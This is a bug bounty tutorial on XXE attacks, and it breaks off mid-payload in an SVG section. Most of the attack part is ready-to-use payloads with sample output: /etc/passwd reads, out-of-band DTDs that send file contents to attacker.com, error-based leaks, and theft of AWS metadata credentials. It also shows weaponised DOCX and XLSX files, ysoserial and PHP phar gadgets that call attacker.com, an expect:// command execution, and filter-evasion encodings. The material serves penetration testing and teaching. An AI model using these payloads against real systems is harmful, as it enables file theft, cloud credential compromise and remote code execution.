Imagine uploading an innocent-looking XML file to a web application’s import feature, only to receive the server’s /etc/passwd file in the response moments later. Or submitting a DOCX resume that silently extracts AWS credentials from the cloud metadata service.
These are real-world XXE (XML external entity) attacks – a powerful class of vulnerabilities that hunters exploit to uncover critical security flaws in production applications.
XXE exploits abuse the way XML parsers process external entity references, transforming standard XML functionality into an attack vector for sensitive file disclosure, internal network reconnaissance and even denial-of-service. This guide explores the main XXE vulnerability types and demonstrates practical exploitation techniques with real-world scenarios.
So what is XML external entity (XXE)?
In simple terms, XXE occurs when an application parses XML input from untrusted sources without properly configuring its XML parser to prevent the processing of external entities.
Consider this example: you’re using a web application that accepts XML data for an import feature – perhaps for product catalogs, configuration files or API requests. The application expects legitimate XML, but what happens when you inject malicious entity declarations?
An XXE attack exploits the XML parser’s built-in capability to reference external resources. By crafting XML with special entity declarations pointing to local files (like /etc/passwd) or remote endpoints (like internal services), an attacker can trick the parser into accessing resources it shouldn’t.
The vulnerability stems from XML’s entity system – a feature designed to allow reusable content within documents. External entities extend this by enabling references to resources via uniform resource identifiers (URIs). When applications fail to restrict this functionality, attackers can weaponise it to read arbitrary files, probe internal networks or trigger resource exhaustion.
If a site lacks robust XXE protections, an attacker can manipulate XML input to extract database credentials, access application source code, read cloud instance metadata or even achieve remote code execution (RCE) in specific configurations.
Understanding XML parsers in web applications
Before diving into exploitation, it’s important to understand where XML parsers lurk in modern applications – because XXE vulnerabilities don’t just exist in obvious XML endpoints.
An XML parser is a software component that reads XML data and converts it into a format applications can work with. Every programming language has XML parsing libraries: Java uses DOM and SAX parsers, Python has lxml and xml.etree, PHP uses libxml. The problem? Many of these parsers historically shipped with dangerous features such as external entity processing enabled by default, and older versions or permissive configurations still behave that way.
Where parsers hide
XML parsers appear in unexpected places throughout modern applications:
- Document processing systems that accept DOCX, XLSX or PPTX uploads use XML parsers behind the scenes – these Microsoft Office formats are actually ZIP archives containing XML files. A resume-screening platform parsing DOCX resumes, an invoice system processing XLSX spreadsheets or a presentation converter handling PPTX files all rely on XML parsers.
- API endpoints often support multiple content types. A JSON API using frameworks like Spring Boot or Express might automatically invoke an XML parser when you switch the Content-Type header from application/json to application/xml – even if the developers never intended to support XML.
- Legacy SOAP services are inherently XML-based. Many enterprise systems maintain SOAP endpoints for backward compatibility or integration with older systems, and these services parse XML with every request.
- SVG image processors parse Scalable Vector Graphics (SVG) as XML. Upload an avatar, submit a logo or process any SVG file and an XML parser is invoked.
The key insight? You don’t need to see <xml> in the documentation to find XML parsers. They’re embedded throughout the application stack, quietly processing data in formats you might not immediately recognise as XML-based.
Why XML parsers can be vulnerable
The vulnerability stems from how XML parsers handle external entities – a feature that becomes dangerous when explicitly enabled or when using legacy configurations.
When an XML parser encounters an entity reference like &xxe;, it looks up the entity definition in the DOCTYPE declaration. If that entity is defined as SYSTEM "file:///etc/passwd" and external entity processing is enabled, the parser fetches and substitutes the file’s contents.
Many modern XML parsing libraries no longer resolve external entities by default. Python’s xml.etree and PHP’s libxml (from libxml2 2.9 onwards) reject or ignore external entities unless they are explicitly configured otherwise or a parser bug bypasses the protection. Java is a notable exception: DocumentBuilderFactory and the other JAXP parsers still resolve external entities until the application hardens them.
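As a small illustration of how one parser treats entities by default, the sketch below feeds two documents to Python’s standard-library xml.etree.ElementTree: one declaring an internal entity and one declaring an external entity. The helper name try_parse and both sample documents are made up for this example, and other parsers or versions may behave differently.

```python
import xml.etree.ElementTree as ET

# Internal entity: defined inline, no external resource involved.
INTERNAL = '<!DOCTYPE r [<!ENTITY greet "hello">]><r>&greet;</r>'
# External entity: asks the parser to read a local file.
EXTERNAL = '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><r>&xxe;</r>'


def try_parse(xml_text: str) -> str:
    """Return the root element's text, or a short note if the parser refuses."""
    try:
        return ET.fromstring(xml_text).text or ""
    except ET.ParseError as exc:
        return f"rejected: {exc}"


print(try_parse(INTERNAL))  # the internal entity is expanded in place
print(try_parse(EXTERNAL))  # xml.etree does not resolve external entities
```

The second call ends in a ParseError rather than file contents, which is the behaviour a tester should expect from a parser whose defaults have not been loosened.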
So where do XXE vulnerabilities come from? Several scenarios create exposure:
- Legacy code and outdated libraries still running on old versions where external entities were enabled by default. Applications deployed years ago may have never updated their XML processing dependencies.
- Explicit enabling of dangerous features when developers need specific XML functionality and unknowingly enable external entity processing. This often happens when following outdated tutorials or Stack Overflow answers that don’t emphasise security implications.
- Custom XML configurations where developers override secure defaults without understanding the risks. A simple setFeature("http://xml.org/sax/features/external-general-entities", true) reopens the vulnerability.
- Third-party libraries and frameworks that internally enable external entity processing for their own functionality, exposing applications that depend on them.
This is why XXE remains relevant – not because most parsers are vulnerable by default, but because misconfigurations, legacy systems and explicitly enabled features still create attack surface in production applications.
How XXE attacks work – step-by-step
A successful XXE attack follows this pattern:
- The attacker identifies an application endpoint that accepts and processes XML input
- The attacker crafts malicious XML containing external entity declarations
- The malicious payload is submitted through the vulnerable input (API, file upload, import feature)
- The XML parser processes the input and resolves the external entity references
- The parser accesses the specified resource (local file, remote endpoint, etc)
- The application either returns the accessed data directly or the attacker uses alternative techniques to retrieve it
Impact of XXE vulnerabilities
The severity of XXE vulnerabilities can be substantial. At minimum, successful exploitation enables arbitrary file read access – exposing configuration files, application source code and sensitive system files like /etc/passwd or C:\boot.ini.
Beyond file disclosure, XXE can facilitate Server-Side Request Forgery (SSRF) attacks against internal infrastructure, allowing attackers to probe internal networks, access cloud metadata endpoints (particularly dangerous in AWS/Azure/GCP environments) or interact with internal services that should never be externally accessible.
In severe cases, XXE can lead to remote code execution when combined with specific features (like PHP’s expect:// wrapper) or trigger denial-of-service via resource exhaustion, notably through the ‘Billion Laughs’ attack. For Bug Bounty hunters, XXE vulnerabilities typically command high or critical severity ratings – particularly when you can demonstrate impact through sensitive file disclosure or internal network access.
Classic XXE attacks
A classic XXE vulnerability occurs when an attacker can inject external entity declarations into XML input that directly retrieve and display sensitive data within the application’s response.
To exploit this:
- The attacker crafts an XML document with a DOCTYPE declaration defining an external entity
- This entity references a target resource using protocols like file:// for local files
- The entity is referenced within the XML body where the parser will substitute its value
- When the application processes and returns the parsed XML, the contents of the referenced resource are exposed
Classic XXE is the most straightforward variant to exploit since the exfiltrated data appears directly in the application’s response. However, it requires that the application reflects parsed XML content back to the user – a pattern common in APIs, data import features and services that process and display XML.
Classic XXE scenario
Imagine you’re testing an e-commerce platform’s product import API at /api/products/import. The feature allows administrators to bulk upload products via XML files.
Standard legitimate request:
POST /api/products/import HTTP/1.1
Host: shop.example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<products>
  <product>
    <name>Laptop Pro 15</name>
    <price>1299.99</price>
    <category>Electronics</category>
  </product>
</products>
You modify this request to test for XXE by injecting an external entity declaration:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE products [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<products>
  <product>
    <name>&xxe;</name>
    <price>999</price>
    <category>Test</category>
  </product>
</products>
If the application is vulnerable, the XML parser resolves the &xxe; entity by reading /etc/passwd from the server’s filesystem. The API response reflects this content:
{
  "status": "success",
  "imported": 1,
  "products": [
    {
      "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n...",
      "price": "999",
      "category": "Test"
    }
  ]
}
The application has just handed you the contents of a sensitive system file – and, with it, a critical vulnerability to report.
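The scenario above can be sketched in Python as two small helpers: one that builds the test document for a given target URI, and one that checks whether a JSON response reflects passwd-style content. The function names, the regular expression and the assumed response shape (a "products" list with "name" fields, as in the sample response) are illustrative assumptions, not part of any real API.

```python
import json
import re


def build_classic_payload(target_uri: str) -> str:
    """Build the product-import document with an external entity in <name>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE products [\n"
        f'  <!ENTITY xxe SYSTEM "{target_uri}">\n'
        "]>\n"
        "<products><product>"
        "<name>&xxe;</name><price>999</price><category>Test</category>"
        "</product></products>"
    )


# Loose heuristic for a passwd entry: user:password:uid:gid:
PASSWD_LINE = re.compile(r"^[^:\n]+:[^:\n]*:\d+:\d+:", re.MULTILINE)


def reflected_passwd(response_body: str) -> bool:
    """True if any returned product name looks like /etc/passwd content."""
    data = json.loads(response_body)
    return any(
        PASSWD_LINE.search(str(product.get("name", "")))
        for product in data.get("products", [])
    )
```

Checking the response programmatically is mainly useful when the same payload is replayed against many endpoints and the reflected field is easy to miss by eye.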
Blind XXE with out-of-band techniques
Blind XXE vulnerabilities occur when the application parses external entities but doesn’t reflect the retrieved data in its responses. This is actually more common in production environments than classic XXE.
In blind scenarios, attackers must use out-of-band (OOB) techniques to confirm the vulnerability and exfiltrate data. This approach involves setting up an attacker-controlled server to receive callbacks, crafting XML that references an external DTD (Document Type Definition) hosted on your server, and monitoring server logs for incoming connections. Even if the application doesn’t display parsed content, the XML parser still makes outbound connections to resolve external entities – connections you can observe and control.
Blind XXE requires more sophisticated exploitation but is prevalent in applications that process XML without displaying results, such as backend processing systems, document converters or asynchronous import features.
Blind XXE scenario
You’re pentesting a document conversion service at docs.company.com that accepts XML files and converts them to PDF format. The service provides only a success message and download link – no parsed content is displayed.
First, you set up infrastructure on your virtual private server at attacker.com. You create a malicious DTD file:
evil.dtd (hosted at http://attacker.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfil;
Then you craft the initial XML payload:
POST /api/convert HTTP/1.1
Host: docs.company.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<document>
  <title>Quarterly Report</title>
  <content>Test content</content>
</document>
Here’s what happens behind the scenes: the application’s XML parser processes your payload and resolves the external entity reference to http://attacker.com/evil.dtd. The parser fetches your malicious DTD file. The DTD defines the %file entity, which reads /etc/hostname. Then the %eval entity declares another entity, %exfil, which triggers an HTTP request containing the file contents. Your server receives GET /log?data=prod-docs-01 HTTP/1.1.
Even though the application never displays the parsed content, your server logs reveal the hostname – confirming both the vulnerability and successful data exfiltration.
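The attacker-side infrastructure in this scenario can be approximated with Python’s standard library. The sketch below serves the DTD at /evil.dtd and records the data parameter of any other request. The function names, the default bind address and port are assumptions chosen for illustration, and a real engagement would more likely rely on an existing interaction-catching service.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse


def make_dtd(callback_base: str, target_file: str) -> str:
    """Build the external DTD: read a file, then call back with its contents."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{callback_base}/log?data=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def respond(path: str, host: str, captured: list, target_file: str = "/etc/hostname") -> str:
    """Serve /evil.dtd; for any other path, record the 'data' query parameter."""
    url = urlparse(path)
    if url.path == "/evil.dtd":
        return make_dtd(f"http://{host}", target_file)
    captured.extend(parse_qs(url.query).get("data", []))
    return ""


def start_listener(bind: str = "0.0.0.0", port: int = 8000):
    """Start the listener in a background thread; returns (server, captured)."""
    captured: list = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = respond(self.path, self.headers.get("Host", ""), captured).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    server = ThreadingHTTPServer((bind, port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, captured
```

Keeping the request logic in respond, separate from the HTTP plumbing, makes it easy to check offline that the generated DTD and the captured values look right before exposing the listener.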
Error-based XXE exploitation
When traditional blind XXE with out-of-band exfiltration isn’t possible – perhaps due to egress filtering or network restrictions – error-based XXE provides an alternative approach. This technique forces the XML parser to generate error messages that include sensitive data, which the application then displays to the user.
The key is to trigger a parsing error that includes the content you want to exfiltrate. This is typically done by referencing a non-existent file path that contains the data you’ve read. The parser throws an error like File not found: /nonexistent/root:x:0:0:… and the application helpfully returns this error message to you.
Error-based XXE with local DTD
One powerful error-based technique leverages DTD files that already exist on the target server. Most Linux systems have several DTD files in predictable locations like /usr/share/xml/fontconfig/fonts.dtd or /usr/share/yelp/dtd/docbookx.dtd. These files contain entity definitions that you can hijack.
GoSecure published a comprehensive list of common DTD file paths across different operating systems and applications.
If you’ve fingerprinted the target system during reconnaissance and identified the operating system, you can also use GoSecure’s dtd-finder tool to automate local discovery and determine which DTD files are available on similar configurations.
For example, /usr/share/xml/fontconfig/fonts.dtd contains an entity %constant that you can redefine:
<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
  <!ENTITY % constant 'aaa)>
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ELEMENT aa (bb'>
  %local_dtd;
]>
<message>anything</message>
This payload loads the local DTD file, redefines the %constant entity to include your malicious entity definitions, reads /etc/passwd into %file, creates an %error entity that references a non-existent path with the file contents and triggers the error. The application returns an error message like:
XML parsing error: file:///nonexistent/root:x:0:0:root:/root:/bin/bash (No such file or directory)
The error message contains the exfiltrated data. This technique works even when outbound connections are blocked, making it extremely valuable in restricted environments.
Error-based XXE with remote DTD
When you control an external server and can make the target fetch your DTD, error-based XXE becomes even more flexible. Let’s say you submit this initial payload:
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">
  %ext;
]>
<root></root>

Your evil.dtd file contains:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
The parser then fetches your DTD, attempts to load a non-existent file with the contents of /etc/passwd in the path and generates an error that leaks the data. The application displays Error: file:///nonexistent/root:x:0:0:root:/root:/bin/bash not found.
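Once the error comes back, the leaked content still has to be separated from the parser’s own wording. The following sketch pulls it out with a regular expression. The pattern assumes the two error shapes quoted in this section and the file:///nonexistent/ prefix used in the payloads; real parsers phrase their errors differently, so treat both the pattern and the helper name extract_leak as placeholders.

```python
import re
from typing import Optional

# Assumed error shapes, taken from the two sample messages in this section.
LEAK_PATTERN = re.compile(
    r"file:///nonexistent/(?P<leak>.*?)"
    r"(?: \(No such file or directory\)| not found\.?$|$)",
    re.DOTALL,
)


def extract_leak(error_message: str) -> Optional[str]:
    """Return the file contents embedded in the error path, if any."""
    match = LEAK_PATTERN.search(error_message)
    return match.group("leak") if match else None


local_dtd_error = (
    "XML parsing error: file:///nonexistent/root:x:0:0:root:/root:/bin/bash "
    "(No such file or directory)"
)
print(extract_leak(local_dtd_error))
```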
Error-based XXE is particularly effective in Bug Bounty scenarios where you need to demonstrate impact quickly, without setting up complex out-of-band exfiltration infrastructure.
XXE via file upload functionality
File upload features represent a frequently overlooked XXE attack surface. Many applications process XML-based file formats without developers realising the security implications. Commonly vulnerable file types include Office documents (DOCX, XLSX, PPTX), which are ZIP archives containing XML files, as well as SVG images, which are XML-based.
Vulnerabilities emerge when applications extract and parse these files server-side for purposes like thumbnail generation, metadata extraction, content indexing or format conversion. Among these formats, XLSX files deserve special attention because they’re commonly processed by automated systems – from invoice processors to HR platforms parsing uploaded resumes or financial reports.
Weaponising XLSX files with XXElixir
For Bug Bounty hunters testing XLSX file uploads, XXElixir is an invaluable tool that automates the injection of XXE payloads into Excel files. Rather than manually unzipping archives, modifying XML files and repackaging them, XXElixir streamlines the workflow. For example:
python3 XXElixir.py --file template.xlsx --url https://attacker.com/xxe --output poisoned.xlsx
Or with a custom XXE payload:
python3 XXElixir.py --file template.xlsx --xxe "<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>" --output poisoned.xlsx
The tool works by extracting the XLSX archive, injecting your payload into xl/workbook.xml and repackaging everything into a valid Excel file that applications will process normally.
Testing with Canarytokens
Before diving into full exploitation, it’s often wise to test whether an application actually processes your uploaded XLSX files. Canarytokens provides MS Excel tokens that alert you when the file is opened. However, if you upload a canarytoken XLSX and never receive an alert, this often indicates the file is being processed by a command-line parser rather than being opened in Microsoft Excel.
This is actually good news for XXE testing. Command-line parsers and libraries (like Apache POI for Java, openpyxl for Python or EPPlus for .NET) often process XML with fewer security restrictions than desktop applications. If your canarytoken isn’t triggered but the file is accepted and processed, a server-side library is probably parsing the XML, which makes the endpoint a good candidate for XXE testing.
File upload XXE scenario
Let’s examine a practical scenario. You’re testing a job application portal at careers.company.com that accepts resume uploads in the DOCX format. The system extracts text from resumes for keyword matching and displays a formatted preview.
To exploit this, you create a weaponised DOCX file. Start with a legitimate DOCX resume then unzip it: unzip resume.docx -d resume_modified/. Locate and edit word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE w:document [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p>
<w:r>
<w:t>Professional Summary: &xxe;</w:t>
</w:r>
</w:p>
</w:body>
</w:document>
Repackage the file with cd resume_modified && zip -r ../malicious_resume.docx *, then upload malicious_resume.docx through the application. When the resume parsing system processes your file to generate a preview, the XXE payload executes. The resume preview displays:
Professional Summary: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
The application has inadvertently exposed the server’s password file through an ostensibly innocent resume upload.
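The unzip, edit and re-zip steps can also be scripted. Below is a minimal sketch using Python’s zipfile module: it copies every archive member unchanged except word/document.xml, where it adds the DOCTYPE after the XML declaration and appends an entity reference after a marker string. The function name inject_docx and the marker-based approach are assumptions for illustration; it presumes the marker text already appears inside a text run of the document.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE w:document [\n<!ENTITY xxe SYSTEM "{uri}">\n]>\n'


def inject_docx(docx_bytes: bytes, uri: str, marker: str) -> bytes:
    """Return a copy of the DOCX with an external entity referenced after `marker`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == "word/document.xml":
                xml = data.decode("utf-8")
                # Keep the XML declaration first; the DOCTYPE goes right after it.
                split = xml.find("?>") + 2 if xml.startswith("<?xml") else 0
                xml = xml[:split] + "\n" + DOCTYPE.format(uri=uri) + xml[split:]
                # Reference the entity once, next to the marker text.
                xml = xml.replace(marker, f"{marker} &xxe;", 1)
                data = xml.encode("utf-8")
            dst.writestr(name, data)
    return out.getvalue()
```

A call such as inject_docx(open("resume.docx", "rb").read(), "file:///etc/passwd", "Professional Summary:") would return the bytes of the modified archive, ready to be written to malicious_resume.docx.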
For XLSX files, the process is similar, but you’d modify xl/workbook.xml or xl/sharedStrings.xml. Using XXElixir, this entire process becomes trivial – perfect for rapid Bug Bounty testing where you need to test multiple upload endpoints efficiently.
XXE through Content-Type manipulation
One of the most overlooked XXE attack vectors involves exploiting applications that accept multiple content types. Many modern APIs are designed to handle both JSON and XML, but developers often only implement security controls for the expected format.
The attack works by switching the Content-Type header from application/json to application/xml or text/xml, then submitting XML payloads to endpoints that normally expect JSON. Surprisingly, many frameworks will automatically parse and process the XML if the parser is available, even when JSON is the documented format.
Content-Type switching scenario
Imagine you’re testing an API endpoint at https://api.example.com/users/update that accepts JSON for updating user profiles:
POST /users/update HTTP/1.1
Host: api.example.com
Content-Type: application/json

{
  "username": "john_doe",
  "email": "john@example.com",
  "bio": "Software developer"
}
Standard testing might miss that this endpoint also accepts XML. So try switching the Content-Type:
POST /users/update HTTP/1.1
Host: api.example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <username>john_doe</username>
  <email>john@example.com</email>
  <bio>&xxe;</bio>
</root>
If the application’s backend framework (such as Spring, Laravel or Express) has XML parsing capabilities enabled, it may automatically deserialize your XML input. The parser resolves the &xxe; entity and suddenly you’re reading server files through an endpoint that “only accepts JSON”.
This technique is particularly effective against REST APIs that use frameworks with automatic content negotiation. Many developers assume their JSON-only API is safe from XXE, never realising that simply changing the Content-Type header can expose XML parsing functionality.
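When many JSON endpoints need the same check, the conversion can be scripted. The sketch below turns a flat JSON body into the equivalent XML document, places the entity reference in one chosen field and prepares (without sending) a POST request with the switched Content-Type. The function names are hypothetical, and the code assumes a flat JSON object whose keys are valid XML element names.

```python
import json
import urllib.request
from xml.sax.saxutils import escape


def json_to_xxe_xml(json_body: str, inject_field: str,
                    uri: str = "file:///etc/passwd") -> str:
    """Mirror a flat JSON object as XML, with &xxe; placed in one field."""
    fields = json.loads(json_body)
    parts = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{uri}">]>',
        "<root>",
    ]
    for key, value in fields.items():
        text = "&xxe;" if key == inject_field else escape(str(value))
        parts.append(f"  <{key}>{text}</{key}>")
    parts.append("</root>")
    return "\n".join(parts)


def build_request(url: str, xml_body: str) -> urllib.request.Request:
    """Prepare the POST request with the XML content type (nothing is sent here)."""
    return urllib.request.Request(
        url,
        data=xml_body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
```

Passing the prepared request to urllib.request.urlopen would send it; a second attempt with text/xml is worthwhile, since some frameworks route the two content types differently.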
XXE for server-side request forgery (SSRF)
XXE vulnerabilities can be leveraged to perform SSRF attacks, giving you access through the vulnerable server to internal resources that should be unreachable from the outside.
By using HTTP or other protocol schemes in external entity declarations, you can force the XML parser to make requests to arbitrary endpoints. This is particularly powerful because requests originate from the server itself (a trusted source), internal network resources become accessible, cloud metadata endpoints can be queried, and firewall rules and network segmentation may not block server-to-server traffic.
XXE to SSRF scenario
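Let’s say you’ve discovered an XXE vulnerability in an application running on AWS EC2. You can leverage this to access the AWS instance metadata service – a goldmine of sensitive information including temporary IAM credentials. The plain GET requests used here only work when the instance still allows IMDSv1; IMDSv2 requires a session token obtained through a PUT request, which an external entity cannot send.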
First, you probe to confirm access to the metadata service:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<request>
  <data>&xxe;</data>
</request>
The response reveals available metadata paths, including iam/, confirming the server can access the metadata service.
Next, you enumerate available IAM roles:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<request>
  <data>&xxe;</data>
</request>
The response to this request is web-application-role, the name of the IAM role attached to the EC2 instance.
Finally, you extract the temporary credentials:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/web-application-role">
]>
<request>
  <data>&xxe;</data>
</request>
And voila: the application returns…
{
  "Code": "Success",
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "wJalrXUtnFEMI...",
  "Token": "IQoJb3JpZ2luX2...",
  "Expiration": "2025-12-15T18:30:00Z"
}
…you’ve just extracted temporary AWS credentials with all the permissions assigned to that IAM role – a critical finding that could lead to complete cloud infrastructure compromise.
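The three requests follow a fixed pattern, so they can be generated rather than hand-edited. The sketch below builds the payload for a given metadata path, derives the credentials path from the role listing, and redacts the secret values before they go into a report. The helper names are hypothetical, and redacting the credentials is a suggested reporting habit rather than something the scenario above prescribes.

```python
import json

METADATA_BASE = "http://169.254.169.254/latest/meta-data/"


def ssrf_payload(path: str = "") -> str:
    """Build the XXE document that makes the server fetch a metadata path."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY xxe SYSTEM "{METADATA_BASE}{path}">\n'
        "]>\n"
        "<request><data>&xxe;</data></request>"
    )


def credentials_path(role_listing: str) -> str:
    """Turn the role listing (one role name per line) into the next path to request."""
    role = role_listing.strip().splitlines()[0]
    return f"iam/security-credentials/{role}"


def redact_credentials(body: str) -> dict:
    """Keep enough to prove impact without copying live secrets into a report."""
    creds = json.loads(body)
    return {
        "AccessKeyId": creds["AccessKeyId"][:4] + "...",
        "SecretAccessKey": "<redacted>",
        "Token": "<redacted>",
        "Expiration": creds["Expiration"],
    }
```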
XXE to remote code execution (RCE)
While XXE vulnerabilities typically lead to file disclosure or SSRF, certain configurations can escalate them to full remote code execution. RCE through XXE is rare but devastating when discovered.
Java XXE to RCE via deserialization
The most powerful XXE-to-RCE technique exploits Java applications that combine XML processing with file upload functionality. This attack chain leverages unsafe Java deserialization.
How it works
- Upload a malicious serialised Java object
- Use XXE to reference the uploaded file
- If the application deserialises the referenced content, the gadget chain triggers code execution
Practical exploitation
Step 1: Generate the payload with ysoserial:
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/pwned' > payload.ser
Step 2: Upload the malicious file:
Upload payload.ser through any file upload feature:
POST /api/attachments/upload HTTP/1.1
Content-Type: multipart/form-data

[serialised object content]

Response: {"file_id": "12345", "path": "/uploads/12345/payload.ser"}
Step 3: Trigger deserialization via XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///app/uploads/12345/payload.ser">
]>
<request>
  <data>&xxe;</data>
</request>
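The XML parser itself only reads the file. Code execution follows when the application passes the resolved content to a component that deserialises it, so this chain depends on application-specific behaviour rather than on the parser alone.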
PHP phar:// deserialization
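PHP applications can achieve similar results using the phar:// protocol. On PHP versions before 8.0, opening a phar:// path unserialises the archive’s metadata, which can trigger a gadget such as a __destruct() method.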
For quick exploitation, create a malicious PHAR:
<?php
class Exploit {
    public function __destruct() {
        system('curl http://attacker.com/pwned');
    }
}

$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new Exploit());
$phar->stopBuffering();
?>
Then upload and trigger:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "phar:///var/www/uploads/exploit.phar">
]>
<data>&xxe;</data>
PHP expect:// wrapper
The simplest RCE vector is when the PHP expect extension is enabled:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
XXE-to-RCE represents an ideal scenario for critical Bug Bounty findings, where a parser-level vulnerability translates directly into maximum real-world impact. The key is recognising when file upload functionality and XML processing intersect, creating the perfect conditions for exploitation.
Advanced XXE bypass methods
XXE defences vary widely in sophistication, and many can be circumvented through encoding tricks and alternative attack vectors.
Bypassing input validation filters
Many applications implement naive keyword blacklists that can be defeated through encoding and obfuscation.
UTF-16 encoding bypass
If the application filters XML keywords in ASCII, convert your payload to UTF-16:
cat payload.xml | iconv -f UTF-8 -t UTF-16BE > utf16_payload.xml
The XML parser will still process it correctly, but ASCII-based filters won’t detect the malicious content.
This technique exploits the fact that XML parsers must support multiple encodings, but many security filters only inspect ASCII. For a deeper dive into exotic XML encoding attacks and edge cases, check out mohemiv’s ‘Evil XML’ writeup, which covers advanced encoding tricks that bypass WAFs.
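The same conversion can be done in Python, which also makes the effect on a byte-level filter easy to see. The sketch below re-encodes a payload as UTF-16BE, adds a byte order mark and rewrites the encoding declaration so that it matches the new bytes. The function name to_utf16be is an illustrative choice, and whether a given target accepts the result depends on its parser and on anything that inspects the body first.

```python
import codecs
import re
import xml.etree.ElementTree as ET


def to_utf16be(payload: str) -> bytes:
    """Re-encode an XML document as UTF-16BE with a byte order mark."""
    # Keep the declared encoding consistent with the actual bytes.
    declared = re.sub(r'encoding="[^"]*"', 'encoding="UTF-16"', payload, count=1)
    return codecs.BOM_UTF16_BE + declared.encode("utf-16-be")


payload = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<root>&xxe;</root>"
)
encoded = to_utf16be(payload)

# A filter that searches the raw bytes for ASCII keywords no longer matches:
print(b"<!ENTITY" in encoded, b"SYSTEM" in encoded)

# A parser still decodes UTF-16 input (benign document, no entities involved):
benign = to_utf16be('<?xml version="1.0" encoding="UTF-8"?><a>hi</a>')
print(ET.fromstring(benign).text)
```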
HTML entity encoding
Encode characters within entity references to evade simple pattern matching:
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd">
]>
The &#x2F; sequences decode to forward slashes, bypassing filters that look for literal /etc/passwd strings.
Parameter entity indirection
When direct ENTITY declarations are blocked, use parameter entities to introduce them indirectly:
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://attacker.com/bypass.dtd">
  %dtd;
]>
Your external DTD (bypass.dtd) then contains the actual malicious entities that weren’t present in the initial payload.
XXE in uncommon content types
Don’t limit your testing to obvious Content-Type: application/xml requests. XML parsers often process content regardless of the declared content type.
SVG images
POST /api/avatar/upload HTTP/1.1
Host: example.com
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
